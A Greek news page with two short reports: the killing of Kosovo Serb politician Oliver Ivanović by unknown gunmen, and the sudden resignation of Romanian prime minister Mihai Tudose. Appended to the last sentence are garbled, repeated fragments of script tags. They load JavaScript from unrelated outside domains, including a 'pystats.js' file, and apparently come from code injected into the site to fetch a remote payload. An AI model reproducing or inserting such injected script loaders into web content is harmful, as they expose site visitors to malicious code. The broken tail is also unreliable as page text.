Κόσοβο: Ο αρχηγός του Σερβικού κόμματος έπεσε νεκρός από πυρά αγνώστων – Παραιτήθηκε αιφνιδίως ο πρωθυπουργός της Ρουμανίας

Κόσοβο: Ο αρχηγός του Σερβικού κόμματος έπεσε νεκρός από πυρά αγνώστων

Ο αρχηγός του Σερβικού κόμματος του Κοσόβου, Όλιβερ Ιβάνοβιτς, δέχθηκε θανάσιμους πυροβολισμούς έξω από το γραφείο του κόμματος, όπως επιβεβαίωσε ο δικηγόρος του.

Ο Ιβάνοβιτς ήταν ένας από τους σημαντικότερους πολιτικούς της σερβικής πλειοψηφίας του βόρειου τμήματος του Κοσόβου, όπου τα πνεύματα παραμένουν τεταμένα.

«Δυστυχώς, θα ευχόμουν να μην ήταν αλήθεια, αλλά οι γιατροί τον ανακήρυξαν νεκρό στις 9:30 π.μ.», δήλωσε ο Νεμπόγιασα Βλάγιτς, δικηγόρος του Ιβάνοβιτς.

Τα μέσα μαζικής ενημέρωσης της Σερβίας αναφέρουν πως άγνωστοι άνοιξαν πυρ κατά του πολιτικού μπροστά στα γραφεία του Κόμματός Πρωτοβουλίας Πολιτών.

Δικαστήριο του Κόσοβο, σύμφωνα με την Independent, είχε καταδικάσει τον 64χρονο Ιβάνοβιτς για εγκλήματα πολέμου. Η απόφαση είχε ακυρωθεί σε δεύτερο βαθμό και ετοιμαζόταν νέα δίκη για την υπόθεση.

 

Παραιτήθηκε αιφνιδίως ο πρωθυπουργός της Ρουμανίας

Παραιτήθηκε αιφνιδίως ο πρωθυπουργός της Ρουμανίας

Το Σοσιαλοδημοκρατικό κόμμα PSD απέσυρε την κυβερνητική στήριξη

Ο πρωθυπουργός της Ρουμανίας Μιχάι Τουντόσε παραιτήθηκε σήμερα καθώς τα ηγετικά στελέχη του Σοσιαλοδημοκρατικού κόμματος PSD απέσυραν την πολιτική στήριξη στο πρόσωπό του.

«Η ψήφος για την απομάκρυνση του Τουντόσε ήταν συντριπτικά υπέρ», δήλωσε ένα μέλος της ηγεσίας του PSD σε τηλεφωνική επικοινωνία με το πρακτορείο ειδήσεων Ρόιτερς. «Ο Τουντόσε παραιτήθηκε», δήλωσε ένας άλλος υψηλόβαθμο στέλεχος του κόμματος.

Όπως μετέδωσε το Αθηναϊκό Πρακτορείο, ο Τουντόσε είναι ο δεύτερος πρωθυπουργός που απομακρύνεται από το κόμμα του σε διάστημα μικρότερο των επτά μηνών.

Το ανώτερο στέλεχος Παουλ Στανέσκου θα οριστεί ως προσωρινός πρωθυπουργός, τόνισαν αξιωματούχοι.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>